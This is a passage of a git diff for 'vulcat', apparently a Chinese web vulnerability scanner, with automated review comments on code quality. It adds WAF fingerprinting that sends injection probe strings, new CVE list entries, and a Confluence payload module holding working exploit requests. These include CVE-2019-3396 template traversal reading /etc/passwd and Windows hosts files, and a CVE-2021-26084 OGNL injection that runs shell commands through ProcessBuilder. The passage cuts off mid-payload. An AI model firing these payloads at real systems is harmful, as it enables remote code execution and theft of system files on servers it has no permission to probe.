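                            logger.info('yellow_ex', self.lang['core']['stop']['next'])
                            skip_target = True
                            break
                        # … unchanged: else branch logging waf_not_find …
            if skip_target:
                continue
```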
@@ -75,6 +110,7 @@ def addPOC(self, url): logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色 _exit(0) + def scanning(self): ''' 正在扫描, 根据线程数启动poc ''' queue_thread = int(self.queue.qsize() / self.thread)+1 # * 循环次数 @@ -93,24 +129,36 @@ def scanning(self): except KeyboardInterrupt: if self.stop(): continue + else: + self.queue.queue.clear() # * 清空当前url的扫描队列 + break # * 停止当前url的扫描, 并扫描下一个url + + def stop(self): ''' # ! 功能还没写好 Ctrl+C暂停扫描 q(uit) 退出扫描 c(ontinue) 继续扫描 + n(ext) 跳过当前url的扫描 m(odify) (还没写好)修改参数, 输入参数名和值(如-t 3)然后回车, 修改相应参数, 并继续扫描 wq(save and exit) 等待已经运行的poc, 保存并输出已有的漏洞结果, 有--output参数的话则同步保存至文件 ''' while True: - logger.info('reset', '[CTRL+C] q(uit)/c(ontinue)/wq(save and exit): ') # ? 提示信息 - operation = input('\r'.ljust(70)) # * 接收参数 - if operation == 'q': # * 退出 + logger.info('reset', '', print_end='') # ? 提示信息 + operation = input('\r[CTRL+C] - q(uit)/c(ontinue)/n(ext)/wq(save and exit): '.ljust(70))# * 接收参数 + operation = operation.lower() # * 字母转小写 + + if operation in ['q', 'quit']: # * 退出扫描 _exit(0) - elif operation == 'c': # * 继续扫描 + elif operation in ['c', 'continue']: # * 继续扫描 logger.info('yellow_ex', self.lang['core']['stop']['continue']) # ? 日志, 继续扫描 return True - elif operation == 'wq': # * 保存退出 + elif operation in ['wq', 'save and exit']: # * 保存结果并退出 self.end() + elif operation in ['n', 'next']: + logger.info('yellow_ex', self.lang['core']['stop']['next']) # ? 日志, 扫描下一个目标 + + return False def end(self): ''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存''' diff --git a/lib/initial/config.py b/lib/initial/config.py index 1780e68..26548e4 100644 --- a/lib/initial/config.py +++ b/lib/initial/config.py 
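Review bot: `self.queue.queue.clear()` in scanning() reaches into Queue's internal deque without holding its lock, so it races with worker threads that are inside `get()` at that moment; wrap it as `with self.queue.mutex:` / `    self.queue.queue.clear()`, and note that `unfinished_tasks` is not adjusted by this, which matters if anything later calls `queue.join()` — not visible in this hunk. In stop(), the `return False` after the `n`/`next` branch appears to sit at the level of the `while` body rather than inside that branch, so any unrecognised answer also skips the current URL instead of re-prompting; if that is intended the docstring should say so, otherwise move it under the `elif` and let the loop repeat. The `wq` branch calls `self.end()` and would fall back to the prompt if end() ever returned; end()'s body is outside the hunk, so whether it always exits is inferred.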
@@ -77,7 +77,7 @@ def __init__(self, args): 'https': args.http_proxy } - app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'django', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou'] + app_list = ['alidruid', 'airflow', 'apisix', 'appweb', 'cisco', 'confluence', 'django', 'elasticsearch', 'f5bigip', 'fastjson', 'flink', 'keycloak', 'nacos', 'solr', 'struts2', 'spring', 'thinkphp', 'tomcat', 'ueditor', 'weblogic', 'yonyou'] if args.application == 'all': # * -a参数 args.app_list = app_list else: diff --git a/lib/initial/language.py b/lib/initial/language.py index 242cc0e..68e3947 100644 --- a/lib/initial/language.py +++ b/lib/initial/language.py @@ -47,6 +47,12 @@ def language(): 'output_text': 'Save the scan results in TXT format, no vulnerability will not generate files(e.g. --output-text result.txt)', 'output_json': 'Save the scan results in JSON format, no vulnerability will not generate files(e.g. --output-text result.json)' }, + 'general_help': { + 'title': 'General', + 'name': 'General operating parameter', + 'no_waf': 'Disable WAF detection', + 'batch': 'The yes/no option does not require user input. The default option is used' + }, 'lists_help': { 'title': 'Lists', 'name': 'Vulnerability list', 
@@ -54,19 +60,26 @@ def language(): }, 'app_list_help': { 'title': 'Supported target types(Case insensitive)', - 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' + 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' }, 'core': { 'start': { 'start': '[INFO] Start scanning target ', - 'unable': '[WARN] Unable to connect to ' + 'unable': '[WARN] Unable to connect to ', + 'waf': '[WAF] The WAF detection for the current URL starts', + 'waf_find': '[WAF] {} is detected, Whether to continue scanning the current URL? - y(es)/N(o): ', + 'waf_not_find': 'Not found the WAF', + 'waf_timeout': 'WAF recognizes timeout and the target is not responding', + 'waf_conn_error': 'WAF recognition error, unable to connect to destination URL', + 'waf_error': 'WAF identification error, unknown error' }, 'addpoc': { 'notfound': '[ERROR] The application not found: ', 'error': '[ERROR] The addPOC is error' }, 'stop': { - 'continue': '[INFO] Continue to scan' + 'continue': '[INFO] Continue to scan', + 'next': '[INFO] Skip current URL' }, 'end': { 'wait': '[INFO] Wait for all threads to finish. Please wait...', @@ -126,6 +139,12 @@ def language(): 'output_text': '以txt格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.txt)', 'output_json': '以json格式保存扫描结果, 无漏洞时不会生成文件(如: --output-text result.json)' }, + 'general_help': { + 'title': 'General', + 'name': '通用工作参数', + 'no_waf': '禁用waf检测', + 'batch': 'yes/no的选项不需要用户输入, 使用默认选项' + }, 'lists_help': { 'title': 'Lists', 'name': '漏洞列表', 
@@ -133,19 +152,26 @@ def language(): }, 'app_list_help': { 'title': '支持的目标类型(-a参数, 不区分大小写)', - 'name': 'AliDruid,airflow,apisix,appweb,cisco,django,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' + 'name': 'AliDruid,airflow,apisix,appweb,cisco,confluence,django,elasticsearch,f5bigip,fastjson,flink,keycloak,nacos,thinkphp,tomcat,spring,solr,struts2,ueditor,weblogic,yonyou' }, 'core': { 'start': { 'start': '[INFO] 开始扫描目标 ', - 'unable': '[WARN] 无法连接到 ' + 'unable': '[WARN] 无法连接到 ', + 'waf': '[WAF] 开始对当前url进行WAF检测', + 'waf_find': '[WAF] 目标疑似存在{} 是否继续扫描当前url? - y(es)/N(o): ', + 'waf_not_find': '[WAF] 未发现WAF', + 'waf_timeout': 'WAF识别超时, 目标没有响应', + 'waf_conn_error': 'WAF识别出错, 无法连接至目标url', + 'waf_error': 'WAF识别出错, 未知错误' }, 'addpoc': { 'notfound': '[ERROR] 未找到应用程序: ', 'error': '[ERROR] 添加POC时出现错误' }, 'stop': { - 'continue': '[INFO] 继续扫描' + 'continue': '[INFO] 继续扫描', + 'next': '[INFO] 跳过当前url' }, 'end': { 'wait': '[INFO] 等待所有线程结束, 请稍等...', diff --git a/lib/initial/list.py b/lib/initial/list.py index 126b3cb..c75703c 100644 --- a/lib/initial/list.py +++ b/lib/initial/list.py 
@@ -6,20 +6,23 @@ def list(): ''' 显示漏洞列表 ''' + vul_num = 0 vul_list = '' - vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n' for vul in vul_info: for info in vul_info[vul]: - vul_list += '| {}|'.format(vul.ljust(14)) + vul_num += 1 + vul_list += '| {}|'.format(vul.ljust(21)) vul_list += ' {}|'.format(info['vul_id'].ljust(17)) - vul_list += ' {}|'.format(info['type'].ljust(11)) + vul_list += ' {}|'.format(info['type'].ljust(13)) vul_list += ' {}|'.format(info['method'].ljust(9)) - vul_list += ' {}\t|'.format(info['description'].ljust(49)) + vul_list += ' {}\t|'.format(info['description'].ljust(56)) vul_list += '\n' - vul_list += '+' + ('-'*15) + '+' + ('-'*18) + '+' + ('-'*12) + '+' + ('-'*10) + '+' + ('-'*60) + '+\n' + vul_list += '+' + ('-'*22) + '+' + ('-'*18) + '+' + ('-'*14) + '+' + ('-'*10) + '+' + ('-'*67) + '+\n' - print(color.cyan(vul_list)) + print(color.cyan(vul_list + str(vul_num - 1))) + # print(vul_num) sys.exit(0) vul_info = { @@ -31,7 +34,7 @@ def list(): 'description': 'Description\t' } ], - 'AlibabaDruid': [ + 'Alibaba Druid': [ { 'vul_id': 'None', 'type': 'unAuth', @@ -39,7 +42,7 @@ def list(): 'description': '阿里巴巴Druid未授权访问' } ], - 'AlibabaNacos': [ + 'Alibaba Nacos': [ { 'vul_id': 'CVE-2021-29441', 'type': 'unAuth', @@ -47,7 +50,7 @@ def list(): 'description': '阿里巴巴Nacos未授权访问' } ], - 'ApacheAirflow': [ + 'Apache Airflow': [ { 'vul_id': 'CVE-2020-17526', 'type': 'unAuth', @@ -55,7 +58,7 @@ def list(): 'description': 'Airflow身份验证绕过' } ], - 'ApacheAPISIX': [ + 'Apache APISIX': [ { 'vul_id': 'CVE-2020-13945', 'type': 'unAuth', @@ -63,7 +66,7 @@ def list(): 'description': 'Apache APISIX默认密钥' } ], - 'ApacheFlink': [ + 'Apache Flink': [ { 'vul_id': 'CVE-2020-17519', 'type': 'FileRead', 
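Review bot: `print(color.cyan(vul_list + str(vul_num - 1)))` appends a bare number to the table, and the `- 1` silently compensates for the header entry of `vul_info` (the one whose description is `'Description\t'`) being counted like a payload, which a reader cannot tell from the code. Count only real entries — skip that header entry in the loop, or initialise `vul_num = -1` with a comment saying why — and print a labelled line such as `'Total: {}'.format(vul_num)`; the dead `# print(vul_num)` line can be removed. The column widths are now duplicated between the two border lines and the `ljust` calls; one set of named width constants would keep them in sync the next time an application name grows.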
@@ -71,7 +74,7 @@ def list(): 'description': 'Flink目录遍历' } ], - 'ApacheSolr': [ + 'Apache Solr': [ { 'vul_id': 'CVE-2021-27905', 'type': 'SSRF', @@ -79,7 +82,7 @@ def list(): 'description': 'Solr SSRF/任意文件读取' } ], - 'ApacheStruts2': [ + 'Apache Struts2': [ { 'vul_id': 'S2-001', 'type': 'RCE', @@ -117,7 +120,7 @@ def list(): 'description': 'Struts2远程代码执行' } ], - 'ApacheTomcat': [ + 'Apache Tomcat': [ { 'vul_id': 'CVE-2017-12615', 'type': 'FileUpload', @@ -133,6 +136,32 @@ def list(): 'description': 'AppWeb身份认证绕过' } ], + 'Atlassian Confluence': [ + { + 'vul_id': 'CVE-2015-8399', + 'type': 'FileRead', + 'method': 'GET', + 'description': 'Confluence任意文件包含' + }, + { + 'vul_id': 'CVE-2019-3396', + 'type': 'RCE/FileRead', + 'method': 'POST', + 'description': 'Confluence路径遍历和命令执行' + }, + { + 'vul_id': 'CVE-2021-26084', + 'type': 'RCE', + 'method': 'POST', + 'description': 'Confluence Webwork Pre-Auth OGNL表达式命令注入' + }, + { + 'vul_id': 'CVE-2022-26134', + 'type': 'RCE', + 'method': 'GET', + 'description': 'Confluence远程代码执行' + } + ], 'Cisco': [ { 'vul_id': 'CVE-2020-3580', @@ -148,18 +177,18 @@ def list(): 'method': 'GET', 'description': 'debug page XSS跨站脚本攻击' }, - { - 'vul_id': 'CVE-2019-14234', - 'type': 'SQLinject', - 'method': 'GET', - 'description': 'JSONfield SQL注入' - }, { 'vul_id': 'CVE-2018-14574', 'type': 'Redirect', 'method': 'GET', 'description': 'CommonMiddleware url重定向' }, + { + 'vul_id': 'CVE-2019-14234', + 'type': 'SQLinject', + 'method': 'GET', + 'description': 'JSONfield SQL注入' + }, { 'vul_id': 'CVE-2020-9402', 'type': 'SQLinject', 
@@ -173,7 +202,33 @@ def list(): 'description': 'QuerySet.order_by SQL注入' } ], - 'F5-BIG-IP': [ + 'ElasticSearch': [ + { + 'vul_id': 'CVE-2014-3120', + 'type': 'RCE', + 'method': 'POST', + 'description': 'ElasticSearch命令执行' + }, + { + 'vul_id': 'CVE-2015-1427', + 'type': 'RCE', + 'method': 'POST', + 'description': 'ElasticSearch Groovy 沙盒绕过&&代码执行' + }, + { + 'vul_id': 'CVE-2015-3337', + 'type': 'FileRead', + 'method': 'GET', + 'description': 'ElasticSearch 目录穿越' + }, + { + 'vul_id': 'CVE-2015-5531', + 'type': 'FileRead', + 'method': 'PUT/GET', + 'description': 'ElasticSearch 目录穿越' + }, + ], + 'F5 BIG-IP': [ { 'vul_id': 'CVE-2020-5902', 'type': 'RCE', @@ -189,16 +244,16 @@ def list(): ], 'Fastjson': [ { - 'vul_id': 'CNVD-2019-22238', + 'vul_id': 'CNVD-2017-02833', 'type': 'unSerialize', 'method': 'POST', - 'description': 'Fastjson <= 1.2.47 反序列化' + 'description': 'Fastjson <= 1.2.24 反序列化' }, { - 'vul_id': 'CVE-2017-18349', + 'vul_id': 'CNVD-2019-22238', 'type': 'unSerialize', 'method': 'POST', - 'description': 'Fastjson <= 1.2.24 反序列化' + 'description': 'Fastjson <= 1.2.47 反序列化' } ], 'Keycloak': [ @@ -211,10 +266,10 @@ def list(): ], 'Spring': [ { - 'vul_id': 'CVE-2022-22965', - 'type': 'RCE', - 'method': 'GET/POST', - 'description': 'Spring Framework远程代码执行' + 'vul_id': 'CVE-2020-5410', + 'type': 'FileRead', + 'method': 'GET', + 'description': 'Spring Cloud目录遍历' }, { 'vul_id': 'CVE-2021-21234', @@ -223,10 +278,10 @@ def list(): 'description': 'Spring Boot目录遍历' }, { - 'vul_id': 'CVE-2020-5410', - 'type': 'FileRead', - 'method': 'GET', - 'description': 'Spring Cloud目录遍历' + 'vul_id': 'CVE-2022-22947', + 'type': 'RCE', + 'method': 'POST', + 'description': 'Spring Cloud Gateway SpEl远程代码执行' }, { 'vul_id': 'CVE-2022-22963', 
@@ -235,13 +290,19 @@ def list(): 'description': 'Spring Cloud Function SpEL远程代码执行' }, { - 'vul_id': 'CVE-2022-22947', + 'vul_id': 'CVE-2022-22965', 'type': 'RCE', - 'method': 'POST', - 'description': 'Spring Cloud Gateway SpEl远程代码执行' + 'method': 'GET/POST', + 'description': 'Spring Framework远程代码执行' } ], 'ThinkPHP': [ + { + 'vul_id': 'CVE-2018-1002015', + 'type': 'RCE', + 'method': 'GET', + 'description': 'ThinkPHP5.x 远程代码执行' + }, { 'vul_id': 'CNVD-2018-24942', 'type': 'RCE', @@ -275,18 +336,18 @@ def list(): 'description': 'Ueditor编辑器SSRF' } ], - 'Weblogic': [ + 'Oracle Weblogic': [ { - 'vul_id': 'CVE-2020-14882', - 'type': 'RCE', + 'vul_id': 'CVE-2014-4210', + 'type': 'SSRF', 'method': 'GET', - 'description': 'Weblogic 未授权命令执行' + 'description': 'Weblogic 服务端请求伪造' }, { - 'vul_id': 'CVE-2020-14750', - 'type': 'unAuth', - 'method': 'GET', - 'description': 'Weblogic 权限验证绕过' + 'vul_id': 'CVE-2017-10271', + 'type': 'unSerialize', + 'method': 'POST', + 'description': 'Weblogic XMLDecoder反序列化' }, { 'vul_id': 'CVE-2019-2725', @@ -295,16 +356,16 @@ def list(): 'description': 'Weblogic wls9_async反序列化' }, { - 'vul_id': 'CVE-2017-10271', - 'type': 'unSerialize', - 'method': 'POST', - 'description': 'Weblogic XMLDecoder反序列化' + 'vul_id': 'CVE-2020-14750', + 'type': 'unAuth', + 'method': 'GET', + 'description': 'Weblogic 权限验证绕过' }, { - 'vul_id': 'CVE-2014-4210', - 'type': 'SSRF', + 'vul_id': 'CVE-2020-14882', + 'type': 'RCE', 'method': 'GET', - 'description': 'Weblogic 服务端请求伪造' + 'description': 'Weblogic 未授权命令执行' } ], 'Yonyou': [ diff --git a/lib/initial/parse.py b/lib/initial/parse.py index 521ba05..362261c 100644 --- a/lib/initial/parse.py +++ b/lib/initial/parse.py 
@@ -18,7 +18,7 @@ def parse(): python3 vulcat.py -u https://www.example.com/ -a thinkphp --log 3 python3 vulcat.py -f url.txt -t 10 python3 vulcat.py --list -''', version='vulcat.py-1.0.7\n') +''', version='vulcat.py-1.0.9\n') # * 指定目标 target = parser.add_option_group(lang['target_help']['title'], lang['target_help']['name']) target.add_option('-u', '--url', type='string', dest='url', default=None, help=lang['target_help']['url']) @@ -48,6 +48,12 @@ def parse(): save.add_option('--output-text', type='string', dest='txt_filename',default=None, help=lang['save_help']['output_text']) save.add_option('--output-json', type='string', dest='json_filename',default=None, help=lang['save_help']['output_json']) + # * 通用参数 + general = parser.add_option_group(lang['general_help']['title'], lang['general_help']['name']) + general.add_option('--no-waf', dest='no_waf', action='store_true', help=lang['general_help']['no_waf']) + # general.add_option('--no-webapp', dest='no_webapp', action='store_true', help='') + general.add_option('--batch', dest='batch', action='store_true', help=lang['general_help']['batch']) + # * 查看漏洞列表 lists = parser.add_option_group(lang['lists_help']['title'], lang['lists_help']['name']) lists.add_option('--list', dest='list', help=lang['lists_help']['list'], action='store_true') diff --git a/lib/tool/check.py b/lib/tool/check.py index 0e4724a..ea658d2 100644 --- a/lib/tool/check.py +++ b/lib/tool/check.py @@ -41,7 +41,7 @@ def check_res(res, md): ''' 检查poc误报 来自: https://github.com/zhzyker/vulmap/blob/main/core/verify.py ''' - res_info = "echo.{0,10}" + md + res_info = "echo.{0,20}" + md if(re.search(res_info, res) != None): return "not_vul" else: diff --git a/lib/tool/fingerprint.py b/lib/tool/fingerprint.py index 56b2f5b..81e9278 100644 --- a/lib/tool/fingerprint.py +++ b/lib/tool/fingerprint.py 
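Review bot: `--no-waf` and `--batch` are `store_true` options declared without `default=False`, so optparse leaves them as None when absent; coreScan's `if (not self.no_waf)` and `if (not self.batch)` treat None as False so this works, but `default=False` documents the intent and keeps `config.get('batch')` a real bool for any later consumer. The commented-out `--no-webapp` option is dead code until webapp fingerprinting exists; a `# TODO: --no-webapp once webapp_identify is implemented` comment says the same thing without leaving a disabled option in the parser.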
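Review bot: `md` is concatenated into the regex unescaped in `res_info = "echo.{0,20}" + md`; today it is an md5 hex string so this is harmless, but cve_2022_26134_scan in payloads/AtlassianConfluence.py now passes a marker containing quotes and a colon, and `re.escape(md)` makes the helper safe for any marker. Widening the window to 20 characters is fine, but `.` does not match newlines, so an echoed command split across lines is still not caught — a one-line comment stating that the check only covers the single-line echo case would save the next reader from assuming more.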
@@ -1,15 +1,183 @@ #!/usr/bin/env python3 # -*- coding:utf-8 -*- -''' 还没写好, 敬请期待 +''' + web应用程序防火墙 指纹识别 + 参考-1: https://mp.weixin.qq.com/s/8F060FU9g_78z57UKS-JsQ - 用于web指纹识别 - Used for Web fingerprint identification + web应用程序/框架 指纹识别 + 敬请期待 ''' -def fingerprint(): - pass +from lib.initial.config import config +from lib.tool.logger import logger +from lib.tool import check +from thirdparty import requests +from time import sleep + +class Identify(): + def webapp_identify(self): + ''' + web应用程序/框架识别 + ''' + + + def waf_identify(self, url): + ''' + waf识别 + ''' + try: + vul_info = { + 'app_name': 'WAF', + 'vul_id': 'identify' + } + path_1 = '?id=1 and 1=1 -- qwe' + path_2 = '?id=1\'">//' + + url_1 = url + path_1 + url_2 = url + path_2 + + logger.info('yellow_ex', self.lang['core']['start']['waf']) + + res = requests.get( + url_2, + timeout=self.timeout, + headers=self.headers, + proxies=self.proxies, + verify=False, + allow_redirects=False + ) + logger.logging(vul_info, res.status_code, res) # * LOG + + res.encoding = 'utf-8' + for waf_fp in self.waf_fingerprint: + for finger in waf_fp['fingerprint']: + # if ((res.status_code == waf_fp['status_code']) and (finger in res.text)): + if (finger in res.text): + return waf_fp['name'] + + return None + except requests.ConnectTimeout: + logger.info('red_ex', self.lang['core']['start']['waf_timeout']) + return None + except requests.ConnectionError: + logger.logging('red_ex', self.lang['core']['start']['waf_conn_error']) + return None + except: + logger.logging('red_ex', self.lang['core']['start']['waf_error']) + return None + + + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers') + self.proxies = config.get('proxies') + self.lang = config.get('lang') + + # * webapp指纹库 + self.webapp_fingerprint = [ + '敬请期待' + ] + # * waf指纹库 + self.waf_fingerprint = [ + { + 'name': '阿里云盾(Aliyun Waf)', + 'status_code': 405, + 'fingerprint': [ + '很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断', + 'your request has 
been blocked as it may cause potential threats to the server' + ] + }, + { + 'name': '腾讯云盾(Tencent WAF)', + 'status_code': 403, + 'fingerprint': [ + '腾讯T-Sec Web应用防火墙(WAF)', + # '很抱歉,您提交的请求可能对网站造成威胁,请求已被管理员设置的策略阻断' + ] + }, + { + 'name': '安全狗(SafeDog)', + 'status_code': None, + 'fingerprint': [ + '如果您是网站管理员,请登录安全狗', + '您的请求带有不合法参数,已被网站管理员设置拦截' + ] + }, + { + 'name': '华为云盾(HuaWei WAF)', + 'status_code': 418, + 'fingerprint': [ + '您的请求疑似攻击行为' + ] + }, + { + 'name': '网宿云盾', + 'status_code': None, + 'fingerprint': [ + '您当前的访问行为存在异常,请稍后重试' + ] + }, + { + 'name': '创宇盾', + 'status_code': None, + 'fingerprint': [ + '当前访问疑似黑客攻击,已被创宇盾拦截', + '最近有可疑的攻击行为,请稍后重试' + ] + }, + { + 'name': '玄武盾', + 'status_code': None, + 'fingerprint': [ + '您的访问可能对网站造成危险,已被云防护安全拦截' + ] + }, + # { + # 'name': '360网站卫士', + # 'status_code': None, + # 'fingerprint': [ + # '当前访问可能对网站安全造成威胁,已被网站卫士拦截' + # ] + # }, + # { + # 'name': '奇安信网站卫士 ', + # 'status_code': 493, + # 'fingerprint': [ + # '抱歉!您的访问可能对网站造成威胁,已被云防护拦截' + # ] + # }, + { + 'name': '长亭SafeLine', + 'status_code': 403, + 'fingerprint': [ + '您的访问请求可能对网站造成安全威胁,请求已被 长亭 SafeLine 阻断' + ] + }, + { + 'name': 'OpenRASP', + 'status_code': 400, + 'fingerprint': [ + 'Request blocked by OpenRASP', + '您的请求包含恶意行为,已被服务器拒绝' + ] + }, + { + 'name': '西部数码云网盾', + 'status_code': None, + 'fingerprint': [ + '检测到疑似攻击行为,访问已被云网盾拦截', + '系统检查到您的访问存在疑似攻击的行为,已经自动列入禁止名单' + ] + }, + # { + # 'name': '', + # 'status_code': 403, + # 'fingerprint': [ + # '' + # ] + # } + ] -def identify(): - pass \ No newline at end of file +identify = Identify() \ No newline at end of file diff --git a/lib/tool/head.py b/lib/tool/head.py new file mode 100644 index 0000000..44693ef --- /dev/null +++ b/lib/tool/head.py 
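Review bot: The two `logger.logging('red_ex', ...)` calls in waf_identify's ConnectionError and bare-except handlers pass a colour name where `logger.logging` takes `vul_info` (every other call site passes `(vul_info, status_code, res)`), so a connection failure during WAF detection raises again inside the handler; the ConnectTimeout branch already uses `logger.info('red_ex', ...)` and the other two should match. The bare `except:` also catches KeyboardInterrupt, so Ctrl+C pressed while the probe is in flight is reported as `waf_error` instead of reaching coreScan's stop() handler — narrow it to `except Exception:`. `path_1`/`url_1` are built but never sent, and each entry's `status_code` is never compared because that condition is commented out, so a page that merely quotes a WAF's block text is reported as that WAF; either restore the status-code comparison or drop the unused fields. `check` and `sleep` are imported but unused in this file.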
@@ -0,0 +1,16 @@ +#!/usr/bin/env /python3 +# -*- coding:utf-8 -*- + +''' + Headers请求头处理 + 合并2个headers +''' + +def merge(old_headers, new_headers): + ''' + 用于合并2个headers, 并返回合并后的headers, 新headers将会覆盖旧headers中的同名内容. + ''' + + merge_headers = old_headers.copy() + merge_headers.update(new_headers) + return merge_headers \ No newline at end of file diff --git a/lib/tool/logger.py b/lib/tool/logger.py index 34aabd5..254f1e0 100644 --- a/lib/tool/logger.py +++ b/lib/tool/logger.py @@ -91,6 +91,7 @@ def logging_5(self, vul_info, status_code, res): def logging_6(self, vul_info, status_code, res): ''' 日志6级, (框架名称+状态码+漏洞编号)+请求包+响应头+响应内容 ''' + res.encoding = 'utf-8' info_6 = self.logging_5(vul_info, status_code, res) try: info_6 = info_6[:-1] diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py new file mode 100644 index 0000000..1d4d67a --- /dev/null +++ b/payloads/AtlassianConfluence.py 
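Review bot: The shebang `#!/usr/bin/env /python3` makes env look for an executable literally named `/python3`; the other files in this commit use `#!/usr/bin/env python3` and this one should too. merge() can be written as `return {**old_headers, **new_headers}`, which avoids relying on the argument having a `copy()` method. The docstring should also state that a new dict is returned and neither argument is modified, since the payload modules keep the result in long-lived payload tables and then mutate it (the Referer assignment in cve_2019_3396_scan).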
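Review bot: `res.encoding = 'utf-8'` in logging_6 mutates the Response that the calling scan method goes on to inspect — the payload modules call `logger.logging(vul_info, res.status_code, res)` before their `in res.text` checks — so enabling log level 6 changes how every response body is decoded and overrides the server-declared charset. If the override is only needed for the log text, decode a copy inside the logger, e.g. `body = res.content.decode('utf-8', errors='replace')`, and leave the response untouched; logging_5's body is outside the hunk, so where it reads the text is inferred. A comment on the line explaining why the declared charset is distrusted would help if the override is kept.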
@@ -0,0 +1,386 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' + Atlassian Confluence扫描类: + 1. Confluence路径遍历和命令执行 + CVE-2019-3396 + Payload: https://vulhub.org/#/environments/confluence/CVE-2019-3396/ + + 2. Confluence Server Webwork Pre-Auth OGNL表达式命令注入 + CVE-2021-26084 + Payload: https://vulhub.org/#/environments/confluence/CVE-2021-26084/ + + 3. Confluence任意文件包含 + CVE-2015-8399 + Payload: https://blog.csdn.net/caiqiiqi/article/details/106004003 + + 4. Confluence远程代码执行 + CVE-2022-26134 + Payload: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134 + +file:///etc/passwd +file:///C:\Windows\System32\drivers\etc\hosts +file:///C:/Windows/System32/drivers/etc/hosts +''' + +from lib.api.dns import dns +from lib.initial.config import config +from lib.tool.md5 import md5, random_md5 +from lib.tool.logger import logger +from lib.tool.thread import thread +from lib.tool import check +from lib.tool import head +from thirdparty import requests +from time import sleep + +class AtlassianConfluence(): + def __init__(self): + self.timeout = config.get('timeout') + self.headers = config.get('headers').copy() + self.proxies = config.get('proxies') + + self.app_name = 'AtlassianConfluence' + self.md = md5(self.app_name) + self.cmd = 'echo ' + self.md + + self.cve_2019_3396_payloads = [ + # { # * 用于命令执行, 需要将payload保存至.vm文件中, 然后加载远程文件 + # 'path': 'rest/tinymce/1/macro/preview', + # 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.example.com/v/123456", "width": "1000"," height": "1000","_template":"https://www.example.com/confluence.vm","command":' + self.cmd + '}}}', + # 'headers': self.headers.update({ + # 'Content-Type': 'application/json; charset=utf-8' + # }) + # }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": 
"1000","_template":"file:///etc/passwd"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:\Windows\System32\drivers\etc\hosts"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"file:///C:/Windows/System32/drivers/etc/hosts"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + }, + { + 'path': 'rest/tinymce/1/macro/preview', + 'data': '{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"../web.xml"}}}', + 'headers': head.merge(self.headers, {'Content-Type': 'application/json; charset=utf-8'}) + } + ] + + self.cve_2021_26084_payloads = [ + { + 'path': 'pages/doenterpagevariables.action', + 'data': 
'queryString=%5cu0027%2b%7bClass.forName%28%5cu0027javax.script.ScriptEngineManager%5cu0027%29.newInstance%28%29.getEngineByName%28%5cu0027JavaScript%5cu0027%29.%5cu0065val%28%5cu0027var+isWin+%3d+java.lang.System.getProperty%28%5cu0022os.name%5cu0022%29.toLowerCase%28%29.contains%28%5cu0022win%5cu0022%29%3b+var+cmd+%3d+new+java.lang.String%28%5cu0022cat%20/etc/passwd%5cu0022%29%3bvar+p+%3d+new+java.lang.ProcessBuilder%28%29%3b+if%28isWin%29%7bp.command%28%5cu0022cmd.exe%5cu0022%2c+%5cu0022%2fc%5cu0022%2c+cmd%29%3b+%7d+else%7bp.command%28%5cu0022bash%5cu0022%2c+%5cu0022-c%5cu0022%2c+cmd%29%3b+%7dp.redirectErrorStream%28true%29%3b+var+process%3d+p.start%28%29%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader%28process.getInputStream%28%29%29%3b+var+bufferedReader+%3d+new+java.io.BufferedReader%28inputStreamReader%29%3b+var+line+%3d+%5cu0022%5cu0022%3b+var+output+%3d+%5cu0022%5cu0022%3b+while%28%28line+%3d+bufferedReader.readLine%28%29%29+%21%3d+null%29%7boutput+%3d+output+%2b+line+%2b+java.lang.Character.toString%2810%29%3b+%7d%5cu0027%29%7d%2b%5cu0027', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'pages/doenterpagevariables.action', + 'data': 'queryString=%5cu0027%2b%7b555*666%7d%2b%5cu0027', + 'headers': head.merge(self.headers, {}) + } + ] + + self.cve_2015_8399_payloads = [ + { + 'path': 'viewdefaultdecorator.action?decoratorName=file:///etc/passwd', + 'data': '', + 'headers': head.merge(self.headers, {}) + }, + { + 'path': 'viewdefaultdecorator.action?decoratorName=file:///C:\Windows\System32\drivers\etc\hosts', + 'data': '', + 